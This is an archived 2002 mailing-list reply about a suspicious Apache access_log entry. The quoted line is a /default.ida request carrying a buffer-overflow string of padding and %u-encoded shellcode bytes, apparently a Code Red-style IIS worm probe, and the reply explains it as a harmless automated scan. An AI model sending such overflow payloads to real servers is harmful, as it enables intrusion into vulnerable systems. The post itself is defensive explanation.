[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ale] Found in my acess_log (httpd)

Subject: [ale] Found in my acess_log (httpd)
From: naugrimk at yahoo.com (Michael Golden)
Date: 10 Feb 2002 13:44:56 -0500

On Sun, 2002-02-10 at 15:27, Adrin wrote:
> I found this in my access_log file.
> This is a log of http request , I think.
> :)
> 
> 217.118.42.38 - -
> [05/Feb/2002:07:16:18 -0500] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9
> 090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u909
> 0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a  HTTP/1.0" 400 349 "-"
> "-"
> 
> 
> Is someone trying to run a buffer over
> flow?

Looks like just another IIS type exploit. Probably not someone
specifically targetting you but just a scan type thing. I assume you are
running apache and so it is an annoyance but won't hurt anything.
(Except maybe your bandwidth a little if you get enough of them)

Michael

 This is a digitally signed message part

Prev by Date: [ale] frozen-bubble
Next by Date: [ale] Re: [ale-unemployed] Mission Statement / Business Model
Previous by thread: [ale] frozen-bubble
Next by thread: [ale] Found in my acess_log (httpd)
Index(es):
- Date
- Thread